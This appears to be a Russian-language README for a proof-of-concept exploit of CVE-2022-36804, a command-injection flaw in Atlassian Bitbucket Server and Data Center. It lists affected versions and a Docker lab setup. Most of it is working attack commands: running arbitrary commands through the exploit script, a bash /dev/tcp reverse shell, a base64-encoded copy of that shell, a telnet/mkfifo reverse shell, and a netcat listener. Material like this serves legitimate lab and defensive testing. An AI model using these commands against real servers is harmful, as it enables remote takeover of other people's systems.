
Критическая уязвимость внедрения команд была обнаружена в нескольких конечных точках API Atlassian Bitbucket Server и Data Center. Эта уязвимость затрагивает все версии Bitbucket Server и Data Center, выпущенные до версий <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 и <8.3.1
Критическая уязвимость внедрения команд была обнаружена в нескольких конечных точках API сервера Atlassian Bitbucket и Data Center. Эта уязвимость затрагивает все версии Bitbucket Server и Data Center, выпущенные до версий <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 и <8.3.1.
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7
Замените 172.17.0.3 на свой локальный IP-адрес
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
Запустите netcat слушатель с помощью:
nc -lvp 4444
Преобразуйте /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 в base64 на случай ошибки выполнения полезной нагрузки.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
Если вы все еще сталкиваетесь с ошибкой, выполните команду ниже:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
Рекомендуется установить уязвимую версию Bitbucket Server на машине Windows/Linux для практики. Так будет проще получить обратную оболочку по сравнению с образами Docker.
Дополнительную информацию можно найти здесь.